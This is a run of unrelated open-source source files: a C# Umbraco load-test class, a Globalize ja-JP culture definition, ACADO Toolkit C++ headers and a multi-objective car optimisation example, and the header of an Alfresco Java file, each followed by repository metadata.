        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propEEE222 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propEEE333 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propEEE444 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propEEE555 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propEEE666 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propEEE777 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propEEE888 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propEEE999 { get; set; }
        /////////////////
        // Second block: identical pattern with a "Second" name prefix.
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondAAA000 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondAAA111 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondAAA222 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondAAA333 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondAAA444 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondAAA555 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondAAA666 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondAAA777 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondAAA888 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondAAA999 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondBBB000 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondBBB111 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondBBB222 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondBBB333 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondBBB444 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondBBB555 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondBBB666 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondBBB777 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondBBB888 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondBBB999 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondCCC000 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondCCC111 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondCCC222 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondCCC333 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondCCC444 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondCCC555 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondCCC666 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondCCC777 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondCCC888 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondCCC999 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondDDD000 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondDDD111 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondDDD222 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondDDD333 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondDDD444 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondDDD555 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondDDD666 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondDDD777 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondDDD888 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondDDD999 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondEEE000 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondEEE111 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondEEE222 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondEEE333 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondEEE444 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondEEE555 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondEEE666 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondEEE777 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondEEE888 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propSecondEEE999 { get; set; }
    }
}
| GertyEngrie/uSiteBuilder | source/Vega.Test.Entities/DocumentTypes/LoadTest/LoadTestDT45.cs | C# | lgpl-2.1 | 14,428 |
/*
* Globalize Culture ja-JP
*
* http://github.com/jquery/globalize
*
* Copyright Software Freedom Conservancy, Inc.
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* This file was generated by the Globalize Culture Generator
* Translation: bugs found in this file need to be fixed in the generator
*/
// Registers the Japanese (Japan) culture with the Ample SDK locale system.
// Pure data: number/currency formatting plus two calendars — the Gregorian
// "standard" calendar and the era-based "Japanese" calendar.
ample.locale.addCultureInfo("ja-JP", "default", {
	name: "ja-JP",
	englishName: "Japanese (Japan)",
	nativeName: "日本語 (日本)",
	language: "ja",
	numberFormat: {
		"NaN": "NaN (非数値)",
		negativeInfinity: "-∞",
		positiveInfinity: "+∞",
		percent: {
			pattern: ["-n%","n%"]
		},
		currency: {
			// Yen amounts carry no decimal places.
			pattern: ["-$n","$n"],
			decimals: 0,
			symbol: "¥"
		}
	},
	calendars: {
		standard: {
			days: {
				names: ["日曜日","月曜日","火曜日","水曜日","木曜日","金曜日","土曜日"],
				namesAbbr: ["日","月","火","水","木","金","土"],
				namesShort: ["日","月","火","水","木","金","土"]
			},
			months: {
				names: ["1月","2月","3月","4月","5月","6月","7月","8月","9月","10月","11月","12月",""],
				namesAbbr: ["1","2","3","4","5","6","7","8","9","10","11","12",""]
			},
			AM: ["午前","午前","午前"],
			PM: ["午後","午後","午後"],
			eras: [{"name":"西暦","start":null,"offset":0}],
			patterns: {
				d: "yyyy/MM/dd",
				D: "yyyy'年'M'月'd'日'",
				t: "H:mm",
				T: "H:mm:ss",
				f: "yyyy'年'M'月'd'日' H:mm",
				F: "yyyy'年'M'月'd'日' H:mm:ss",
				M: "M'月'd'日'",
				Y: "yyyy'年'M'月'"
			}
		},
		// Imperial-era calendar: years are counted within each era ("gg" in
		// the patterns below is the era name).
		Japanese: {
			name: "Japanese",
			days: {
				names: ["日曜日","月曜日","火曜日","水曜日","木曜日","金曜日","土曜日"],
				namesAbbr: ["日","月","火","水","木","金","土"],
				namesShort: ["日","月","火","水","木","金","土"]
			},
			months: {
				names: ["1月","2月","3月","4月","5月","6月","7月","8月","9月","10月","11月","12月",""],
				namesAbbr: ["1","2","3","4","5","6","7","8","9","10","11","12",""]
			},
			AM: ["午前","午前","午前"],
			PM: ["午後","午後","午後"],
			eras: [{"name":"平成","start":null,"offset":1867},{"name":"昭和","start":-1812153600000,"offset":1911},{"name":"大正","start":-1357603200000,"offset":1925},{"name":"明治","start":60022080000,"offset":1988}],
			twoDigitYearMax: 99,
			patterns: {
				d: "gg y/M/d",
				D: "gg y'年'M'月'd'日'",
				t: "H:mm",
				T: "H:mm:ss",
				f: "gg y'年'M'月'd'日' H:mm",
				F: "gg y'年'M'月'd'日' H:mm:ss",
				M: "M'月'd'日'",
				Y: "gg y'年'M'月'"
			}
		}
	}
});
| zonebuilder/zonebuilder.github.io | jul/ample-sdk/ample/cultures/ja-JP.js | JavaScript | lgpl-3.0 | 2,657 |
/*
* This file is part of ACADO Toolkit.
*
* ACADO Toolkit -- A Toolkit for Automatic Control and Dynamic Optimization.
* Copyright (C) 2008-2014 by Boris Houska, Hans Joachim Ferreau,
* Milan Vukov, Rien Quirynen, KU Leuven.
* Developed within the Optimization in Engineering Center (OPTEC)
* under supervision of Moritz Diehl. All rights reserved.
*
* ACADO Toolkit is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* ACADO Toolkit is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with ACADO Toolkit; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/**
* \file include/acado/symbolic_operator/nonsmooth_operator.hpp
* \author Boris Houska, Hans Joachim Ferreau
*/
#ifndef ACADO_TOOLKIT_NONSMOOTH_OPERATOR_HPP
#define ACADO_TOOLKIT_NONSMOOTH_OPERATOR_HPP
#include <acado/symbolic_operator/symbolic_operator_fwd.hpp>
BEGIN_NAMESPACE_ACADO
/**
* \brief Abstract base class for all scalar-valued symbolic operators.
*
* \ingroup BasicDataStructures
*
* The class Operator serves as an abstract base class for all scalar-valued
* symbolic operators.
*
* \author Boris Houska, Hans Joachim Ferreau
*/
class NonsmoothOperator : public Operator{
public:
/** Default constructor. */
NonsmoothOperator();
virtual ~NonsmoothOperator();
/** Sets the argument (note that arg should have dimension 1). */
virtual Operator& operator=( const double & arg );
virtual Operator& operator=( const DVector & arg );
virtual Operator& operator=( const DMatrix & arg );
virtual Operator& operator=( const Expression & arg );
virtual Operator& operator=( const Operator & arg );
Operator& operator+=( const double & arg );
Operator& operator+=( const DVector & arg );
Operator& operator+=( const DMatrix & arg );
Operator& operator+=( const Expression & arg );
Operator& operator-=( const double & arg );
Operator& operator-=( const DVector & arg );
Operator& operator-=( const DMatrix & arg );
Operator& operator-=( const Expression & arg );
Operator& operator*=( const double & arg );
Operator& operator*=( const DVector & arg );
Operator& operator*=( const DMatrix & arg );
Operator& operator*=( const Expression & arg );
Operator& operator/=( const double & arg );
Operator& operator/=( const Expression & arg );
Expression operator+( const double & arg ) const;
Expression operator+( const DVector & arg ) const;
Expression operator+( const DMatrix & arg ) const;
Expression operator+( const Operator& arg ) const;
Expression operator+( const Expression & arg ) const;
Expression operator-( const double & arg ) const;
Expression operator-( const DVector & arg ) const;
Expression operator-( const DMatrix & arg ) const;
Expression operator-( const Operator & arg ) const;
Expression operator-( const Expression & arg ) const;
Expression operator-( ) const;
Expression operator*( const double & arg ) const;
Expression operator*( const DVector & arg ) const;
Expression operator*( const DMatrix & arg ) const;
Expression operator*( const Operator & arg ) const;
Expression operator*( const Expression & arg ) const;
Expression operator/( const double & arg ) const;
Expression operator/( const Operator & arg ) const;
Expression operator/( const Expression & arg ) const;
ConstraintComponent operator<=( const double& ub ) const;
ConstraintComponent operator>=( const double& lb ) const;
ConstraintComponent operator==( const double& b ) const;
ConstraintComponent operator<=( const DVector& ub ) const;
ConstraintComponent operator>=( const DVector& lb ) const;
ConstraintComponent operator==( const DVector& b ) const;
ConstraintComponent operator<=( const VariablesGrid& ub ) const;
ConstraintComponent operator>=( const VariablesGrid& lb ) const;
ConstraintComponent operator==( const VariablesGrid& b ) const;
/** Evaluates the expression and stores the intermediate \n
* results in a buffer (needed for automatic differentiation \n
* in backward mode) \n
* \return SUCCESFUL_RETURN \n
* RET_NAN \n
* */
virtual returnValue evaluate( int number /**< storage position */,
double *x /**< the input variable x */,
double *result /**< the result */ );
/** Evaluates the expression (templated version) */
virtual returnValue evaluate( EvaluationBase *x );
/** Returns the derivative of the expression with respect \n
* to the variable var(index). \n
* \return The expression for the derivative. \n
*
*/
virtual Operator* differentiate( int index /**< diff. index */ );
/** Automatic Differentiation in forward mode on the symbolic \n
* level. This function generates an expression for a \n
* forward derivative \n
* \return SUCCESSFUL_RETURN \n
*/
virtual Operator* AD_forward( int dim , /**< dimension of the seed */
VariableType *varType , /**< the variable types */
int *component, /**< and their components */
Operator **seed , /**< the forward seed */
int &nNewIS , /**< the number of new IS */
TreeProjection ***newIS /**< the new IS-pointer */ );
/** Automatic Differentiation in backward mode on the symbolic \n
* level. This function generates an expression for a \n
* backward derivative \n
* \return SUCCESSFUL_RETURN \n
*/
virtual returnValue AD_backward( int dim , /**< number of directions */
VariableType *varType , /**< the variable types */
int *component, /**< and their components */
Operator *seed , /**< the backward seed */
Operator **df , /**< the result */
int &nNewIS , /**< the number of new IS */
TreeProjection ***newIS /**< the new IS-pointer */ );
/** Automatic Differentiation in symmetric mode on the symbolic \n
* level. This function generates an expression for a \n
* second order derivative. \n
* \return SUCCESSFUL_RETURN \n
*/
virtual returnValue AD_symmetric( int dim , /**< number of directions */
VariableType *varType , /**< the variable types */
int *component , /**< and their components */
Operator *l , /**< the backward seed */
Operator **S , /**< forward seed matrix */
int dimS , /**< dimension of forward seed */
                                          Operator **dfS       , /**< first order forward result             */
Operator **ldf , /**< first order backward result */
                                          Operator **H         , /**< upper triangular part of the Hessian   */
int &nNewLIS , /**< the number of newLIS */
TreeProjection ***newLIS , /**< the new LIS-pointer */
int &nNewSIS , /**< the number of newSIS */
TreeProjection ***newSIS , /**< the new SIS-pointer */
int &nNewHIS , /**< the number of newHIS */
TreeProjection ***newHIS /**< the new HIS-pointer */ );
/** Substitutes var(index) with the expression sub. \n
* \return The substituted expression. \n
*
*/
virtual Operator* substitute( int index /**< subst. index */,
const Operator *sub /**< the substitution*/);
/** Checks whether the expression is zero or one \n
* \return NE_ZERO \n
* NE_ONE \n
* NE_NEITHER_ONE_NOR_ZERO \n
*
*/
virtual NeutralElement isOneOrZero() const;
    /** Asks the expression whether it is depending on a certain type of  \n
* variable. \n
* \return BT_TRUE if a dependency is detected, \n
* BT_FALSE otherwise. \n
*/
virtual BooleanType isDependingOn( VariableType var ) const;
/** Checks whether the expression is depending on a variable \n
* \return BT_FALSE if no dependence is detected \n
* BT_TRUE otherwise \n
*
*/
virtual BooleanType isDependingOn( int dim , /**< number of directions */
VariableType *varType , /**< the variable types */
int *component, /**< and their components */
BooleanType *implicit_dep /**< implicit dependencies */ );
/** Checks whether the expression is linear in \n
* (or not depending on) a variable \n
* \return BT_FALSE if no linearity is \n
* detected \n
* BT_TRUE otherwise \n
*
*/
virtual BooleanType isLinearIn( int dim , /**< number of directions */
VariableType *varType , /**< the variable types */
int *component, /**< and their components */
BooleanType *implicit_dep /**< implicit dependencies */ );
/** Checks whether the expression is polynomial in \n
* the specified variables \n
* \return BT_FALSE if the expression is not polynomial \n
* BT_TRUE otherwise \n
*
*/
virtual BooleanType isPolynomialIn( int dim , /**< number of directions */
VariableType *varType , /**< the variable types */
int *component, /**< and their components */
BooleanType *implicit_dep /**< implicit dependencies */ );
/** Checks whether the expression is rational in \n
* the specified variables \n
* \return BT_FALSE if the expression is not rational \n
* BT_TRUE otherwise \n
*
*/
virtual BooleanType isRationalIn( int dim , /**< number of directions */
VariableType *varType , /**< the variable types */
int *component, /**< and their components */
BooleanType *implicit_dep /**< implicit dependencies */ );
/** Checks whether the expression is smooth in time \n
* \return BT_FALSE if the expression is not smooth \n
* BT_TRUE otherwise \n
*
*/
virtual BooleanType isSmooth( ) const;
/** Returns the monotonicity of the expression. \n
* \return MT_NONDECREASING \n
* MT_NONINCREASING \n
* MT_NONMONOTONIC \n
*
*/
virtual MonotonicityType getMonotonicity( );
/** Returns the curvature of the expression \n
* \return CT_CONSTANT \n
* CT_AFFINE \n
* CT_CONVEX \n
* CT_CONCAVE \n
*
*/
virtual CurvatureType getCurvature( );
/** Overwrites the monotonicity of the expression. \n
* (For the case that the monotonicity is explicitly known) \n
* \return SUCCESSFUL_RETURN \n
*
*/
virtual returnValue setMonotonicity( MonotonicityType monotonicity_ );
/** Overwrites the curvature of the expression. \n
* (For the case that the curvature is explicitly known) \n
* \return SUCCESSFUL_RETURN \n
*
*/
virtual returnValue setCurvature( CurvatureType curvature_ );
/** Automatic Differentiation in forward mode. \n
* This function stores the intermediate \n
* results in a buffer (needed for 2nd order automatic \n
* differentiation in backward mode) \n
* \return SUCCESFUL_RETURN \n
* RET_NAN \n
*/
virtual returnValue AD_forward( int number /**< storage position */,
double *x /**< The evaluation
point x */,
double *seed /**< the seed */,
double *f /**< the value of the
expression at x */,
double *df /**< the derivative of
the expression */ );
/** Automatic Differentiation in forward mode. \n
* This function uses the intermediate \n
* results from a buffer \n
* \return SUCCESFUL_RETURN \n
* RET_NAN \n
*/
virtual returnValue AD_forward( int number /**< storage position */,
double *seed /**< the seed */,
double *df /**< the derivative of
the expression */ );
// IMPORTANT REMARK FOR AD_BACKWARD: run evaluate first to define
// the point x and to compute f.
/** Automatic Differentiation in backward mode based on \n
* buffered values \n
* \return SUCCESFUL_RETURN \n
* RET_NAN \n
*/
virtual returnValue AD_backward( int number /**< the buffer
position */,
double seed /**< the seed */,
double *df /**< the derivative of
the expression */);
/** Automatic Differentiation in forward mode for \n
* 2nd derivatives. \n
* This function uses intermediate \n
* results from a buffer. \n
* \return SUCCESFUL_RETURN \n
* RET_NAN \n
*/
virtual returnValue AD_forward2( int number /**< the buffer
position */,
double *seed1 /**< the seed */,
double *seed2 /**< the seed for the
first derivative */,
double *df /**< the derivative of
the expression */,
double *ddf /**< the 2nd derivative
of the expression*/);
// IMPORTANT REMARK FOR AD_BACKWARD2: run AD_forward first to define
// the point x and to compute f and df.
/** Automatic Differentiation in backward mode for 2nd order \n
* derivatives based on buffered values. \n
* \return SUCCESFUL_RETURN \n
* RET_NAN \n
*/
virtual returnValue AD_backward2( int number /**< the buffer
position */,
double seed1 /**< the seed1 */,
double seed2 /**< the seed2 */,
double *df /**< the 1st derivative
of the expression */,
double *ddf /**< the 2nd derivative
of the expression */ );
/** Prints the expression into a stream. \n
* \return SUCCESFUL_RETURN \n
*/
virtual std::ostream& print( std::ostream &stream ) const;
/** Provides a deep copy of the expression. \n
* \return a clone of the expression. \n
*/
virtual Operator* clone() const;
/** Provides a deep copy of a tree projection. \n
* \return a clone of the TreeProjection or \n
* an assertion if the type this is \n
* expression is no TreeProjection. \n
*/
virtual TreeProjection* cloneTreeProjection() const;
/** Clears the buffer and resets the buffer size \n
* to 1. \n
* \return SUCCESFUL_RETURN \n
*/
virtual returnValue clearBuffer();
/** Enumerates all variables based on a common \n
* IndexList. \n
* \return SUCCESFUL_RETURN
*/
virtual returnValue enumerateVariables( SymbolicIndexList *indexList );
/** Asks the expression for its name. \n
* \return the name of the expression. \n
*/
virtual OperatorName getName();
/** Asks the variable for its relative index. \n
*/
//virtual int getVariableIndex( ) const;
/** Asks the variable for its global index. \n
*/
virtual int getGlobalIndex( ) const;
/** Asks the expression whether it is a variable. \n
* \return The answer. \n
*/
virtual BooleanType isVariable( VariableType &varType,
int &component ) const;
/** The function loadIndices passes an IndexList through \n
* the whole expression tree. Whenever a variable gets the \n
* IndexList it tries to make an entry. However if a \n
     *  variable recognizes that it has already been added       \n
* before it will not be allowed to make a second entry. \n
     *  Note that all variables, in particular the intermediate  \n
* states, will keep in mind whether they were allowed \n
* to make an entry or not. This guarantees that \n
* intermediate states are never evaluated twice if they \n
* occur at several knots of the tree. \n
* \n
* THIS FUNCTION IS FOR INTERNAL USE ONLY. \n
* \n
     *  PLEASE CALL THIS FUNCTION AT MOST ONCE FOR AN EXPRESSION \n
* AS A KIND OF INIT ROUTINE. \n
* \n
* \return the name of the expression. \n
*/
virtual returnValue loadIndices( SymbolicIndexList *indexList /**< The index list to be
* filled with entries */ );
/** Return the value of the constant */
virtual double getValue() const;
/** Returns the argument or NULL if no intermediate argument available */
virtual Operator* passArgument() const;
/** Asks whether all elements are purely symbolic. \n
* \n
* \return BT_TRUE if the complete tree is symbolic. \n
* BT_FALSE otherwise (e.g. if C functions are linked). \n
*/
virtual BooleanType isSymbolic() const;
int nCount;
//
// PROTECTED FUNCTIONS:
//
protected:
};
CLOSE_NAMESPACE_ACADO
#endif
| rienq/acado | acado/symbolic_operator/nonsmooth_operator.hpp | C++ | lgpl-3.0 | 23,173 |
/*
* This file is part of ACADO Toolkit.
*
* ACADO Toolkit -- A Toolkit for Automatic Control and Dynamic Optimization.
* Copyright (C) 2008-2014 by Boris Houska, Hans Joachim Ferreau,
* Milan Vukov, Rien Quirynen, KU Leuven.
* Developed within the Optimization in Engineering Center (OPTEC)
* under supervision of Moritz Diehl. All rights reserved.
*
* ACADO Toolkit is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* ACADO Toolkit is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with ACADO Toolkit; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/**
* \file examples/multi_objective/car_nbi.cpp
* \author Filip Logist, Boris Houska, Hans Joachim Ferreau
* \date 2009
*
* Normal Boundary Intersection for a car example with conflicting time and energy cost
* J1 = int_0^T max(0.0,u)dt
* J2 = T
* due to symmetry u_min = -u_max only half the time interval is simulated
 *    [0.0,t1] = [0.0,t1/2.0]
*
* Reference:
* P. Van Erdeghem, F. Logist, I. Smets, and J. Van Impe 2008.
* Improved procedures for multiple objective optimal control problems.
* In: Proceedings of the 17th IFAC World Congress, 7802-7807, Seoul (Korea)
*
*/
// IMPLEMENTATION:
// ---------------
#include <acado_optimal_control.hpp>
#include <acado_gnuplot.hpp>
/* >>> start tutorial code >>> */
// Entry point: builds the two-objective car optimal control problem and
// traces its Pareto front with the Normal Boundary Intersection method.
int main( ){
    USING_NAMESPACE_ACADO
    // INTRODUCE THE VARIABLES:
    // ----------------------------
    // x1/x2 look like position and velocity of the double integrator below
    // -- TODO confirm against the cited reference.
    DifferentialState x1,x2;
    Control u ;
    Parameter t1 ;
    // Dynamics are integrated over the free horizon [0, t1].
    DifferentialEquation f(0.0,t1);
    // DEFINE A DIFFERENTIAL EQUATION:
    // -------------------------------
    // Double-integrator dynamics: dot(x1) = x2, dot(x2) = u.
    f << dot(x1) == x2;
    f << dot(x2) == u;
    // DEFINE AN OPTIMAL CONTROL PROBLEM:
    // ----------------------------------
    // 25 control intervals on the free end-time horizon [0, t1].
    OCP ocp(0.0,t1,25);
    // Objective 0: terminal x2; objective 1: (scaled) end time t1.
    ocp.minimizeMayerTerm( 0, x2 );
    ocp.minimizeMayerTerm( 1, 2.0*t1/20.0);
    ocp.subjectTo( f );
    // Boundary conditions: start at rest at x1 = 0, end at x1 = 200.
    ocp.subjectTo( AT_START, x1 ==   0.0 );
    ocp.subjectTo( AT_START, x2 ==   0.0 );
    ocp.subjectTo( AT_END  , x1 == 200.0 );
    // Path bounds on states, control, and horizon length.
    ocp.subjectTo( 0.0 <= x1 <= 200.0001 );
    ocp.subjectTo( 0.0 <= x2 <=  40.0    );
    ocp.subjectTo( 0.0 <= u  <=   5.0    );
    ocp.subjectTo( 0.1 <= t1 <=  50.0    );
    // DEFINE A MULTI-OBJECTIVE ALGORITHM AND SOLVE THE OCP:
    // -----------------------------------------------------
    // 11 Pareto points via Normal Boundary Intersection.
    MultiObjectiveAlgorithm algorithm(ocp);
    algorithm.set( PARETO_FRONT_DISCRETIZATION, 11 );
    algorithm.set( PARETO_FRONT_GENERATION, PFG_NORMAL_BOUNDARY_INTERSECTION );
    algorithm.set( KKT_TOLERANCE, 1e-8 );
    // Minimize individual objective function
    algorithm.solveSingleObjective(0);
    // Minimize individual objective function
    algorithm.solveSingleObjective(1);
    // Generate Pareto set
    algorithm.solve();
    // Persist weights, state trajectories, controls, and parameters
    // for all Pareto points.
    algorithm.getWeights("car_nbi_weights.txt");
    algorithm.getAllDifferentialStates("car_nbi_states.txt");
    algorithm.getAllControls("car_nbi_controls.txt");
    algorithm.getAllParameters("car_nbi_parameters.txt");
    // GET THE RESULT FOR THE PARETO FRONT AND PLOT IT:
    // ------------------------------------------------
    VariablesGrid paretoFront;
    algorithm.getParetoFront( paretoFront );
    GnuplotWindow window1;
    window1.addSubplot( paretoFront, "Pareto Front (time versus energy)", "ENERGY","TIME", PM_POINTS );
    window1.plot( );
    // PRINT INFORMATION ABOUT THE ALGORITHM:
    // --------------------------------------
    algorithm.printInfo();
    // SAVE INFORMATION:
    // -----------------
    paretoFront.print( "car_nbi_pareto.txt" );
    return 0;
}
/* <<< end tutorial code <<< */
| rienq/acado | examples/multi_objective/car_nbi.cpp | C++ | lgpl-3.0 | 4,278 |
/*
* This file is part of ACADO Toolkit.
*
* ACADO Toolkit -- A Toolkit for Automatic Control and Dynamic Optimization.
* Copyright (C) 2008-2014 by Boris Houska, Hans Joachim Ferreau,
* Milan Vukov, Rien Quirynen, KU Leuven.
* Developed within the Optimization in Engineering Center (OPTEC)
* under supervision of Moritz Diehl. All rights reserved.
*
* ACADO Toolkit is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* ACADO Toolkit is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with ACADO Toolkit; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/**
* \file include/acado/matrix_vector/matrix_vector_tools.hpp
* \author Milan Vukov
* \date 2013
*/
#ifndef ACADO_TOOLKIT_MATRIX_VECTOR_TOOLS_HPP
#define ACADO_TOOLKIT_MATRIX_VECTOR_TOOLS_HPP
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wshadow"
#pragma GCC diagnostic ignored "-Wfloat-equal"
#include <external_packages/eigen3/Eigen/Dense>
#pragma GCC diagnostic pop
#endif // ACADO_TOOLKIT_MATRIX_VECTOR_TOOLS_HPP
| rienq/acado | acado/matrix_vector/matrix_vector_tools.hpp | C++ | lgpl-3.0 | 1,612 |
/*
* #%L
* Alfresco Repository
* %%
* Copyright (C) 2005 - 2016 Alfresco Software Limited
* %%
* This file is part of the Alfresco software.
* If the software was purchased under a paid Alfresco license, the terms of
* the paid license agreement will prevail. Otherwise, the software is
* provided under the following open source license terms:
*
* Alfresco is free software: you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Alfresco is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with Alfresco. If not, see <http://www.gnu.org/licenses/>.
* #L%
*/
package org.alfresco.repo.management.subsystems;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.locks.ReentrantReadWriteLock;
import org.aopalliance.intercept.MethodInterceptor;
import org.aopalliance.intercept.MethodInvocation;
